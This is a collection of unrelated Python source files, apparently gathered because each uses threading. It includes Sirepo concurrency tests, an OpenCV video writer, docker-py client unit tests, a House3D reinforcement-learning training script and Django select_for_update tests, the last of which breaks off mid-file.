ctx.source.instance.runtime_properties['partition_name'] = get_attribute(ctx.source, '_a4c_OO:tosca.interfaces.relationship.Configure:pre_configure_source:PARTITION_NAME')
ctx.source.instance.update()
|
job_concurrency1_test.py
|
# -*- coding: utf-8 -*-
u"""Concurrency testing
This test does not always fail when there is a problem (false
positive), because it depends on a specific sequence of events
that can't be controlled by the test.
:copyright: Copyright (c) 2020 RadiaSoft LLC. All Rights Reserved.
:license: http://www.apache.org/licenses/LICENSE-2.0.html
"""
from __future__ import absolute_import, division, print_function
import pytest
def test_myapp_cancel(fc):
"""https://github.com/radiasoft/sirepo/issues/2346"""
from pykern import pkunit
import time
import threading
from pykern.pkdebug import pkdlog
d = fc.sr_sim_data()
d.models.simulation.name = 'srunit_long_run'
r = 'heightWeightReport'
def _t2():
pkdlog('start 2')
r2 = fc.sr_post(
'runSimulation',
dict(
forceRun=False,
models=d.models,
report=r,
simulationId=d.models.simulation.simulationId,
simulationType=d.simulationType,),)
pkdlog(r2)
for _ in range(20):
pkunit.pkok(r2.state != 'error', 'unexpected error state: {}')
if r2.state == 'running':
break
if r2.state == 'canceled':
pkdlog('canceled')
break
time.sleep(.1)
pkdlog('runStatus 2')
r2 = fc.sr_post('runStatus', r2.nextRequest)
else:
pkunit.pkfail('runStatus: failed to start running: {}', r2)
pkdlog('start 1')
r1 = fc.sr_post(
'runSimulation',
dict(
forceRun=False,
models=d.models,
report=r,
simulationId=d.models.simulation.simulationId,
simulationType=d.simulationType,
),
)
for _ in range(10):
pkdlog(r1)
pkunit.pkok(r1.state != 'error', 'unexpected error state: {}')
if r1.state == 'running':
break
time.sleep(.1)
r1 = fc.sr_post('runStatus', r1.nextRequest)
else:
pkunit.pkfail('runStatus: failed to start running: {}', r1)
t2 = threading.Thread(target=_t2)
t2.start()
time.sleep(.1)
pkdlog('runCancel')
c = fc.sr_post('runCancel', r1.nextRequest)
pkunit.pkeq('canceled', c.state)
pkdlog('start 3')
r1 = fc.sr_post(
'runSimulation',
dict(
forceRun=False,
models=d.models,
report=r,
simulationId=d.models.simulation.simulationId,
simulationType=d.simulationType,
),
)
for _ in range(10):
pkunit.pkok(r1.state != 'error', 'unexpected error state: {}')
if r1.state == 'running':
break
time.sleep(.1)
r1 = fc.sr_post('runStatus', r1.nextRequest)
else:
pkunit.pkfail('runStatus: failed to start running: {}', r1)
c = fc.sr_post('runCancel', r1.nextRequest)
pkunit.pkeq('canceled', c.state)
def test_elegant_concurrent_sim_frame(fc):
"""https://github.com/radiasoft/sirepo/issues/2474"""
from pykern import pkunit
from pykern.pkcollections import PKDict
from pykern.pkdebug import pkdlog, pkdp
import sirepo.sim_data
import threading
import time
def _get_frames():
for i in range(3):
f = fc.sr_get_json(
'simulationFrame',
PKDict(frame_id=s.frame_id(d, r1, 'elementAnimation19-5', 0)),
)
pkunit.pkeq('completed', f.state)
def _t2(get_frames):
get_frames()
d = fc.sr_sim_data(sim_name='Backtracking', sim_type='elegant' )
s = sirepo.sim_data.get_class(fc.sr_sim_type)
r = 'animation'
r1 = PKDict()
try:
pkdlog('start 1')
r1 = fc.sr_post(
'runSimulation',
dict(
forceRun=False,
models=d.models,
report=r,
simulationId=d.models.simulation.simulationId,
simulationType=d.simulationType,
),
)
for _ in range(10):
pkunit.pkok(r1.state != 'error', 'unexpected error state: {}')
if r1.state == 'completed':
break
time.sleep(1)
r1 = fc.sr_post('runStatus', r1.nextRequest)
else:
pkunit.pkfail('runStatus: failed to complete: {}', r1)
t2 = threading.Thread(target=_t2, args=(_get_frames,))
t2.start()
_get_frames()
t2.join()
finally:
if r1.get('nextRequest'):
fc.sr_post('runCancel', r1.nextRequest)
|
videowriter.py
|
# video writer
# * writes frames at a fixed rate even if camera's rate varies or is imprecise,
# possibly dropping or repeating frames in the process
# (note: for LifeCam, the frame rate depends on the exposure)
# * also writes trajectories (which need to be in sync with frames written)
# * stop() needs to be called at the end of video, unless VideoWriter is
# instantiated with "with"
# code comes from
# Ulrich Stern
# https://github.com/ulrichstern/SkinnerTrax/blob/master/rt-trx/rt-trx.py
# modified by Matias Andina 2020-02-01
import queue
import threading
import cv2
import time
import numpy as np
class VideoWriter:
_EXT = ".avi"
# note: extension ".avi" will be added to given video filename
def __init__(self, filename=None, fps=20.0, resolution = (640,480)):
self.filename = filename
self.empty_filename = filename is None
if self.empty_filename:
return
print ("\nwriting video to %s" %filename)
if resolution is None:
resolution = (320, 240)
self.fourcc = cv2.VideoWriter_fourcc(*'XVID')
self.fps = fps
self.dt = 1.0/fps
self.resolution = resolution
# We will put frames on a queue and get them from there
self.q = queue.Queue()
self._stop = False
# n is the frame number
self.n = 0
self.wrtr = threading.Thread(target=self.recorder)
self.wrtr.start()
# writer thread
def recorder(self):
# initialize things to None
# we will receive tuples, lastframe_ts has the frame and timestamp
lastframe_ts = t0 = video_writer = None
while True:
if self._stop:
break
frame_ts = lastframe_ts
# while we have frames in queue get most recent frame
while not self.q.empty():
# get queue as tupple
frame_ts = self.q.get_nowait()
# only do things with frames that are not None
if frame_ts is not None:
lastframe_ts = frame_ts
# unpack
frame, ts = frame_ts
if video_writer is None:
# initialize cv2 video_writer
video_writer = cv2.VideoWriter(self.filename + self._EXT,
self.fourcc,
self.fps,
self.resolution,
isColor= self.is_color(frame))
t0 = time.time()
# write frame
video_writer.write(frame)
# write timestamp
self.write_timestamp(timestamp=ts)
self.n += 1
if t0 is None:
dt = self.dt
else:
dt = max(0, t0 + self.n * self.dt - time.time())
# this will put the thread to sleep to satisfy frame rate
time.sleep(dt)
# for "with"
def __enter__(self): return self
def __exit__(self, exc_type, exc_value, traceback):
if not self.empty_filename and not self._stop:
self.stop()
# write frame; can be called at rate different from fps
def put_to_q(self, frame, timestamp):
if not self.empty_filename:
# put frame and timestamp as tupple into queue
self.q.put((frame, timestamp))
# returns number (0,1,...) of next frame written to video; None if no video
# written
def frameNum(self): return None if self.empty_filename else self.n
# returns the video filename (without extension), None if no video written
def filename(self): return self.filename
# stop video writer
def stop(self):
if not self.empty_filename:
self._stop = True
self.wrtr.join()
def is_color(self, frame):
if (len(frame.shape) == 3):
return True
else:
return False
def write_timestamp(self, timestamp):
# '%Y-%m-%dT%H:%M:%S.%f' is better than '%Y-%m-%dT%H:%M:%S:%f'
timestamp = timestamp.strftime('%Y-%m-%dT%H:%M:%S.%f')
# this will write timestamps to file
# mind that timestamp must be in a [] for numpy to like it
with open(self.filename + "_timestamp.csv",'a') as outfile:
np.savetxt(outfile, [timestamp],
delimiter=',', fmt='%s')
|
api_test.py
|
import datetime
import json
import io
import os
import re
import shutil
import socket
import tempfile
import threading
import time
import unittest
import docker
from docker.api import APIClient
import requests
from requests.packages import urllib3
import six
from . import fake_api
import pytest
try:
from unittest import mock
except ImportError:
import mock
DEFAULT_TIMEOUT_SECONDS = docker.constants.DEFAULT_TIMEOUT_SECONDS
def response(status_code=200, content='', headers=None, reason=None, elapsed=0,
request=None, raw=None):
res = requests.Response()
res.status_code = status_code
if not isinstance(content, six.binary_type):
content = json.dumps(content).encode('ascii')
res._content = content
res.headers = requests.structures.CaseInsensitiveDict(headers or {})
res.reason = reason
res.elapsed = datetime.timedelta(elapsed)
res.request = request
res.raw = raw
return res
def fake_resolve_authconfig(authconfig, registry=None):
return None
def fake_inspect_container(self, container, tty=False):
return fake_api.get_fake_inspect_container(tty=tty)[1]
def fake_resp(method, url, *args, **kwargs):
key = None
if url in fake_api.fake_responses:
key = url
elif (url, method) in fake_api.fake_responses:
key = (url, method)
if not key:
raise Exception('{0} {1}'.format(method, url))
status_code, content = fake_api.fake_responses[key]()
return response(status_code=status_code, content=content)
fake_request = mock.Mock(side_effect=fake_resp)
def fake_get(self, url, *args, **kwargs):
return fake_request('GET', url, *args, **kwargs)
def fake_post(self, url, *args, **kwargs):
return fake_request('POST', url, *args, **kwargs)
def fake_put(self, url, *args, **kwargs):
return fake_request('PUT', url, *args, **kwargs)
def fake_delete(self, url, *args, **kwargs):
return fake_request('DELETE', url, *args, **kwargs)
def fake_read_from_socket(self, response, stream, tty=False):
return six.binary_type()
url_base = '{0}/'.format(fake_api.prefix)
url_prefix = '{0}v{1}/'.format(
url_base,
docker.constants.DEFAULT_DOCKER_API_VERSION)
class BaseAPIClientTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.multiple(
'docker.api.client.APIClient',
get=fake_get,
post=fake_post,
put=fake_put,
delete=fake_delete,
_read_from_socket=fake_read_from_socket
)
self.patcher.start()
self.client = APIClient()
# Force-clear authconfig to avoid tampering with the tests
self.client._cfg = {'Configs': {}}
def tearDown(self):
self.client.close()
self.patcher.stop()
def base_create_payload(self, img='busybox', cmd=None):
if not cmd:
cmd = ['true']
return {"Tty": False, "Image": img, "Cmd": cmd,
"AttachStdin": False,
"AttachStderr": True, "AttachStdout": True,
"StdinOnce": False,
"OpenStdin": False, "NetworkDisabled": False,
}
class DockerApiTest(BaseAPIClientTest):
def test_ctor(self):
with pytest.raises(docker.errors.DockerException) as excinfo:
APIClient(version=1.12)
assert str(
excinfo.value
) == 'Version parameter must be a string or None. Found float'
def test_url_valid_resource(self):
url = self.client._url('/hello/{0}/world', 'somename')
assert url == '{0}{1}'.format(url_prefix, 'hello/somename/world')
url = self.client._url(
'/hello/{0}/world/{1}', 'somename', 'someothername'
)
assert url == '{0}{1}'.format(
url_prefix, 'hello/somename/world/someothername'
)
url = self.client._url('/hello/{0}/world', 'some?name')
assert url == '{0}{1}'.format(url_prefix, 'hello/some%3Fname/world')
url = self.client._url("/images/{0}/push", "localhost:5000/image")
assert url == '{0}{1}'.format(
url_prefix, 'images/localhost:5000/image/push'
)
def test_url_invalid_resource(self):
with pytest.raises(ValueError):
self.client._url('/hello/{0}/world', ['sakuya', 'izayoi'])
def test_url_no_resource(self):
url = self.client._url('/simple')
assert url == '{0}{1}'.format(url_prefix, 'simple')
def test_url_unversioned_api(self):
url = self.client._url(
'/hello/{0}/world', 'somename', versioned_api=False
)
assert url == '{0}{1}'.format(url_base, 'hello/somename/world')
def test_version(self):
self.client.version()
fake_request.assert_called_with(
'GET',
url_prefix + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_version_no_api_version(self):
self.client.version(False)
fake_request.assert_called_with(
'GET',
url_base + 'version',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_retrieve_server_version(self):
client = APIClient(version="auto")
assert isinstance(client._version, six.string_types)
assert not (client._version == "auto")
client.close()
def test_auto_retrieve_server_version(self):
version = self.client._retrieve_server_version()
assert isinstance(version, six.string_types)
def test_info(self):
self.client.info()
fake_request.assert_called_with(
'GET',
url_prefix + 'info',
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_search(self):
self.client.search('busybox')
fake_request.assert_called_with(
'GET',
url_prefix + 'images/search',
params={'term': 'busybox'},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_login(self):
self.client.login('sakuya', 'izayoi')
args = fake_request.call_args
assert args[0][0] == 'POST'
assert args[0][1] == url_prefix + 'auth'
assert json.loads(args[1]['data']) == {
'username': 'sakuya', 'password': 'izayoi'
}
assert args[1]['headers'] == {'Content-Type': 'application/json'}
assert self.client._auth_configs['auths'] == {
'docker.io': {
'email': None,
'password': 'izayoi',
'username': 'sakuya',
'serveraddress': None,
}
}
def test_events(self):
self.client.events()
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={'since': None, 'until': None, 'filters': None},
stream=True,
timeout=None
)
def test_events_with_since_until(self):
ts = 1356048000
now = datetime.datetime.utcfromtimestamp(ts)
since = now - datetime.timedelta(seconds=10)
until = now + datetime.timedelta(seconds=10)
self.client.events(since=since, until=until)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': ts - 10,
'until': ts + 10,
'filters': None
},
stream=True,
timeout=None
)
def test_events_with_filters(self):
filters = {'event': ['die', 'stop'],
'container': fake_api.FAKE_CONTAINER_ID}
self.client.events(filters=filters)
expected_filters = docker.utils.convert_filters(filters)
fake_request.assert_called_with(
'GET',
url_prefix + 'events',
params={
'since': None,
'until': None,
'filters': expected_filters
},
stream=True,
timeout=None
)
def _socket_path_for_client_session(self, client):
socket_adapter = client.get_adapter('http+docker://')
return socket_adapter.socket_path
def test_url_compatibility_unix(self):
c = APIClient(base_url="unix://socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_unix_triple_slash(self):
c = APIClient(base_url="unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http_unix_triple_slash(self):
c = APIClient(base_url="http+unix:///socket")
assert self._socket_path_for_client_session(c) == '/socket'
def test_url_compatibility_http(self):
c = APIClient(base_url="http://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_url_compatibility_tcp(self):
c = APIClient(base_url="tcp://hostname:1234")
assert c.base_url == "http://hostname:1234"
def test_remove_link(self):
self.client.remove_container(fake_api.FAKE_CONTAINER_ID, link=True)
fake_request.assert_called_with(
'DELETE',
url_prefix + 'containers/3cc2351ab11b',
params={'v': False, 'link': True, 'force': False},
timeout=DEFAULT_TIMEOUT_SECONDS
)
def test_create_host_config_secopt(self):
security_opt = ['apparmor:test_profile']
result = self.client.create_host_config(security_opt=security_opt)
assert 'SecurityOpt' in result
assert result['SecurityOpt'] == security_opt
with pytest.raises(TypeError):
self.client.create_host_config(security_opt='wrong')
def test_stream_helper_decoding(self):
status_code, content = fake_api.fake_responses[url_prefix + 'events']()
content_str = json.dumps(content)
if six.PY3:
content_str = content_str.encode('utf-8')
body = io.BytesIO(content_str)
# mock a stream interface
raw_resp = urllib3.HTTPResponse(body=body)
setattr(raw_resp._fp, 'chunked', True)
setattr(raw_resp._fp, 'chunk_left', len(body.getvalue()) - 1)
# pass `decode=False` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
assert result == content_str
# pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
assert result == content
# non-chunked response, pass `decode=False` to the helper
setattr(raw_resp._fp, 'chunked', False)
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp))
assert result == content_str.decode('utf-8')
# non-chunked response, pass `decode=True` to the helper
raw_resp._fp.seek(0)
resp = response(status_code=status_code, content=content, raw=raw_resp)
result = next(self.client._stream_helper(resp, decode=True))
assert result == content
class StreamTest(unittest.TestCase):
def setUp(self):
socket_dir = tempfile.mkdtemp()
self.build_context = tempfile.mkdtemp()
self.addCleanup(shutil.rmtree, socket_dir)
self.addCleanup(shutil.rmtree, self.build_context)
self.socket_file = os.path.join(socket_dir, 'test_sock.sock')
self.server_socket = self._setup_socket()
self.stop_server = False
server_thread = threading.Thread(target=self.run_server)
server_thread.setDaemon(True)
server_thread.start()
self.response = None
self.request_handler = None
self.addCleanup(server_thread.join)
self.addCleanup(self.stop)
def stop(self):
self.stop_server = True
def _setup_socket(self):
server_sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server_sock.bind(self.socket_file)
# Non-blocking mode so that we can shut the test down easily
server_sock.setblocking(0)
server_sock.listen(5)
return server_sock
def run_server(self):
try:
while not self.stop_server:
try:
connection, client_address = self.server_socket.accept()
except socket.error:
# Probably no connection to accept yet
time.sleep(0.01)
continue
connection.setblocking(1)
try:
self.request_handler(connection)
finally:
connection.close()
finally:
self.server_socket.close()
def early_response_sending_handler(self, connection):
data = b''
headers = None
connection.sendall(self.response)
while not headers:
data += connection.recv(2048)
parts = data.split(b'\r\n\r\n', 1)
if len(parts) == 2:
headers, data = parts
mo = re.search(r'Content-Length: ([0-9]+)', headers.decode())
assert mo
content_length = int(mo.group(1))
while True:
if len(data) >= content_length:
break
data += connection.recv(2048)
@pytest.mark.skipif(
docker.constants.IS_WINDOWS_PLATFORM, reason='Unix only'
)
def test_early_stream_response(self):
self.request_handler = self.early_response_sending_handler
lines = []
for i in range(0, 50):
line = str(i).encode()
lines += [('%x' % len(line)).encode(), line]
lines.append(b'0')
lines.append(b'')
self.response = (
b'HTTP/1.1 200 OK\r\n'
b'Transfer-Encoding: chunked\r\n'
b'\r\n'
) + b'\r\n'.join(lines)
with APIClient(base_url="http+unix://" + self.socket_file) as client:
for i in range(5):
try:
stream = client.build(
path=self.build_context,
)
break
except requests.ConnectionError as e:
if i == 4:
raise e
assert list(stream) == [
str(i).encode() for i in range(50)]
class UserAgentTest(unittest.TestCase):
def setUp(self):
self.patcher = mock.patch.object(
APIClient,
'send',
return_value=fake_resp("GET", "%s/version" % fake_api.prefix)
)
self.mock_send = self.patcher.start()
def tearDown(self):
self.patcher.stop()
def test_default_user_agent(self):
client = APIClient()
client.version()
assert self.mock_send.call_count == 1
headers = self.mock_send.call_args[0][0].headers
expected = 'docker-sdk-python/%s' % docker.__version__
assert headers['User-Agent'] == expected
def test_custom_user_agent(self):
client = APIClient(user_agent='foo/bar')
client.version()
assert self.mock_send.call_count == 1
headers = self.mock_send.call_args[0][0].headers
assert headers['User-Agent'] == 'foo/bar'
class DisableSocketTest(unittest.TestCase):
class DummySocket(object):
def __init__(self, timeout=60):
self.timeout = timeout
def settimeout(self, timeout):
self.timeout = timeout
def gettimeout(self):
return self.timeout
def setUp(self):
self.client = APIClient()
def test_disable_socket_timeout(self):
"""Test that the timeout is disabled on a generic socket object."""
socket = self.DummySocket()
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
def test_disable_socket_timeout2(self):
"""Test that the timeouts are disabled on a generic socket object
and it's _sock object if present."""
socket = self.DummySocket()
socket._sock = self.DummySocket()
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
assert socket._sock.timeout is None
def test_disable_socket_timout_non_blocking(self):
"""Test that a non-blocking socket does not get set to blocking."""
socket = self.DummySocket()
socket._sock = self.DummySocket(0.0)
self.client._disable_socket_timeout(socket)
assert socket.timeout is None
assert socket._sock.timeout == 0.0
|
train_rl_room.py
|
# Copyright (c) Facebook, Inc. and its affiliates.
# All rights reserved.
#
# This source code is licensed under the BSD-style license found in the
# LICENSE file in the root directory of this source tree.
import h5py
import time
import argparse
import numpy as np
import os, sys, json
import os.path as osp
import torch
import torch.nn as nn
import torch.multiprocessing as mp
import _init_paths
from nav.loaders.nav_reinforce_loader import NavReinforceDataset
from nav.models.navigator import Navigator
# from nav.reinforce.eval_process import eval
from nav.reinforce.eval_room_process import eval
from nav.reinforce.train_room_process import train
from nav.reinforce.imitation_process import imitation
def main(args):
mp.set_start_method('forkserver', force=True)
args.gpus = os.environ['CUDA_VISIBLE_DEVICES'].split(',')
args.gpus = [int(x) for x in args.gpus]
# set up shared_model
checkpoint_path = osp.join(args.checkpoint_dir, '%s.pth' % args.start_from)
checkpoint = torch.load(checkpoint_path)
shared_nav_model = Navigator(checkpoint['opt'])
shared_nav_model.load_state_dict(checkpoint['model_state'])
shared_nav_model.cpu()
shared_nav_model.share_memory()
print('shared_nav_model set up.')
# some arguments need to be copied from start_from
args.use_action = checkpoint['opt']['use_action']
args.nav_types = ['room']
# processes
processes = []
counter = mp.Value('i', 0)
lock = mp.Lock()
# train
for rank in range(args.num_processes):
p = mp.Process(target=train, args=(rank, args, shared_nav_model, counter, lock))
p.start()
processes.append(p)
# imitation
p = mp.Process(target=imitation, args=(args.num_processes, args, shared_nav_model, counter))
p.start()
processes.append(p)
# eval
p = mp.Process(target=eval, args=(args.num_processes+1, args, shared_nav_model, counter, 'val'))
p.start()
processes.append(p)
# join
for p in processes:
p.join()
if __name__ == '__main__':
parser = argparse.ArgumentParser()
# Data input settings
parser.add_argument('--data_json', type=str, default='cache/prepro/reinforce/data.json')
parser.add_argument('--data_h5', type=str, default='cache/prepro/reinforce/data.h5')
parser.add_argument('--imitation_data_json', type=str, default='cache/prepro/imitation/data.json')
parser.add_argument('--imitation_data_h5', type=str, default='cache/prepro/imitation/data.h5')
parser.add_argument('--path_feats_dir', type=str, default='cache/path_feats')
parser.add_argument('--path_images_dir', type=str, default='cache/path_images')
parser.add_argument('--target_obj_conn_map_dir', type=str, default='data/target-obj-conn-maps')
parser.add_argument('--pretrained_cnn_path', type=str, default='cache/hybrid_cnn.pt')
parser.add_argument('--house_meta_dir', type=str, default='pyutils/House3D/House3D/metadata')
parser.add_argument('--house_data_dir', type=str, default='data/SUNCGdata/house')
parser.add_argument('--checkpoint_dir', type=str, default='output/nav_room')
parser.add_argument('--seed', type=int, default=24)
# multiprocess settings
parser.add_argument('--num_processes', type=int, default=12)
# log settings
parser.add_argument('--max_epochs', type=int, default=500)
parser.add_argument('--num_iters_per_epoch', type=int, default=1000)
parser.add_argument('--tb_dir', type=str, default='log_dir/nav_room')
parser.add_argument('--log_dir', type=str, default='log_dir/nav_room')
# Navigator settings
parser.add_argument('--shortest_path_ratio', type=float, default=1.0)
parser.add_argument('--max_episode_length', type=int, default=120)
parser.add_argument('--max_threads_per_gpu', type=int, default=1)
parser.add_argument('--mult_increasing_per_iters', type=int, default=2500)
parser.add_argument('--max_seq_length', type=int, default=80, help='max_seq_length')
parser.add_argument('--rnn_type', type=str, default='lstm')
parser.add_argument('--rnn_size', type=int, default=256)
parser.add_argument('--num_layers', type=int, default=1)
parser.add_argument('--rnn_dropout', type=float, default=0.1)
parser.add_argument('--fc_dropout', type=float, default=0.0)
parser.add_argument('--seq_dropout', type=float, default=0.0)
parser.add_argument('--fc_dim', type=int, default=64)
parser.add_argument('--act_dim', type=int, default=64)
# Output settings
parser.add_argument('--start_from', type=str, default='im0')
parser.add_argument('--id', type=str, default='rl0')
# Optimizer
parser.add_argument('--batch_size', type=int, default=20, help='batch size in number of questions per batch')
parser.add_argument('--grad_clip', type=float, default=0.1, help='clip gradients at this value')
parser.add_argument('--learning_rate', type=float, default=1e-5, help='learning rate')
parser.add_argument('--lr_decay', type=int, default=1, help='if decay learning rate')
parser.add_argument('--learning_rate_decay_start', type=int, default=6000, help='at what iters to start decaying learning rate')
parser.add_argument('--learning_rate_decay_every', type=int, default=6000, help='every how many iters thereafter to drop LR by half')
parser.add_argument('--im_learning_rate_decay_start', type=int, default=6000, help='learning rate decay start on Imitation')
parser.add_argument('--im_learning_rate_decay_every', type=int, default=6000, help='learning rate decay every on Imitation')
parser.add_argument('--optim_alpha', type=float, default=0.8, help='alpha for adam')
parser.add_argument('--optim_beta', type=float, default=0.999, help='beta used for adam')
parser.add_argument('--optim_epsilon', type=float, default=1e-8, help='epsilon that goes into denominator for smoothing')
parser.add_argument('--weight_decay', type=float, default=1e-3, help='weight decay for l2 regularization')
args = parser.parse_args()
# update log_dir and tb_dir
args.log_dir = osp.join(args.log_dir, args.id)
args.tb_dir = osp.join(args.tb_dir, args.id)
if not osp.exists(args.log_dir): os.makedirs(args.log_dir)
if not osp.exists(args.tb_dir): os.makedirs(args.tb_dir)
# main
main(args)
|
tests.py
|
import threading
import time
from unittest import mock
from multiple_database.routers import TestRouter
from django.core.exceptions import FieldError
from django.db import (
DatabaseError, NotSupportedError, connection, connections, router,
transaction,
)
from django.test import (
TransactionTestCase, override_settings, skipIfDBFeature,
skipUnlessDBFeature,
)
from django.test.utils import CaptureQueriesContext
from .models import (
City, CityCountryProxy, Country, EUCity, EUCountry, Person, PersonProfile,
)
class SelectForUpdateTests(TransactionTestCase):
available_apps = ['select_for_update']
def setUp(self):
# This is executed in autocommit mode so that code in
# run_select_for_update can see this data.
self.country1 = Country.objects.create(name='Belgium')
self.country2 = Country.objects.create(name='France')
self.city1 = City.objects.create(name='Liberchies', country=self.country1)
self.city2 = City.objects.create(name='Samois-sur-Seine', country=self.country2)
self.person = Person.objects.create(name='Reinhardt', born=self.city1, died=self.city2)
self.person_profile = PersonProfile.objects.create(person=self.person)
# We need another database connection in transaction to test that one
# connection issuing a SELECT ... FOR UPDATE will block.
self.new_connection = connection.copy()
def tearDown(self):
try:
self.end_blocking_transaction()
except (DatabaseError, AttributeError):
pass
self.new_connection.close()
def start_blocking_transaction(self):
self.new_connection.set_autocommit(False)
# Start a blocking transaction. At some point,
# end_blocking_transaction() should be called.
self.cursor = self.new_connection.cursor()
sql = 'SELECT * FROM %(db_table)s %(for_update)s;' % {
'db_table': Person._meta.db_table,
'for_update': self.new_connection.ops.for_update_sql(),
}
self.cursor.execute(sql, ())
self.cursor.fetchone()
def end_blocking_transaction(self):
# Roll back the blocking transaction.
self.cursor.close()
self.new_connection.rollback()
self.new_connection.set_autocommit(True)
def has_for_update_sql(self, queries, **kwargs):
# Examine the SQL that was executed to determine whether it
# contains the 'SELECT..FOR UPDATE' stanza.
for_update_sql = connection.ops.for_update_sql(**kwargs)
return any(for_update_sql in query['sql'] for query in queries)
@skipUnlessDBFeature('has_select_for_update')
def test_for_update_sql_generated(self):
"""
The backend's FOR UPDATE variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update())
self.assertTrue(self.has_for_update_sql(ctx.captured_queries))
@skipUnlessDBFeature('has_select_for_update_nowait')
def test_for_update_sql_generated_nowait(self):
"""
The backend's FOR UPDATE NOWAIT variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(nowait=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, nowait=True))
@skipUnlessDBFeature('has_select_for_update_skip_locked')
def test_for_update_sql_generated_skip_locked(self):
"""
The backend's FOR UPDATE SKIP LOCKED variant appears in
generated SQL when select_for_update is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.all().select_for_update(skip_locked=True))
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, skip_locked=True))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_generated_of(self):
"""
The backend's FOR UPDATE OF variant appears in the generated SQL when
select_for_update() is invoked.
"""
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(Person.objects.select_related(
'born__country',
).select_for_update(
of=('born__country',),
).select_for_update(
of=('self', 'born__country')
))
features = connections['default'].features
if features.select_for_update_of_column:
expected = [
'select_for_update_person"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_person', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self',)))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_eucountry"."country_ptr_id']
else:
expected = ['select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(of=('self', 'country_ptr',)))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucountry"."country_ptr_id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucountry', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_related_model_inheritance_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_eucountry"."country_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_eucountry']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_inheritance_nested_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCity.objects.select_related('country').select_for_update(
of=('self', 'country__country_ptr',),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_eucity"."id',
'select_for_update_country"."entity_ptr_id',
]
else:
expected = ['select_for_update_eucity', 'select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_multilevel_model_inheritance_ptr_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(EUCountry.objects.select_for_update(
of=('country_ptr', 'country_ptr__entity_ptr'),
))
if connection.features.select_for_update_of_column:
expected = [
'select_for_update_country"."entity_ptr_id',
'select_for_update_entity"."id',
]
else:
expected = ['select_for_update_country', 'select_for_update_entity']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_sql_model_proxy_generated_of(self):
with transaction.atomic(), CaptureQueriesContext(connection) as ctx:
list(CityCountryProxy.objects.select_related(
'country',
).select_for_update(
of=('country',),
))
if connection.features.select_for_update_of_column:
expected = ['select_for_update_country"."entity_ptr_id']
else:
expected = ['select_for_update_country']
expected = [connection.ops.quote_name(value) for value in expected]
self.assertTrue(self.has_for_update_sql(ctx.captured_queries, of=expected))
@skipUnlessDBFeature('has_select_for_update_of')
def test_for_update_of_followed_by_values(self):
with transaction.atomic():
values = list(Person.objects.select_for_update(of=('self',)).values('pk'))
self.assertEqual(values, [{'pk': self.person.pk}])
@skipUnlessDBFeature('has_select_for_update_of')
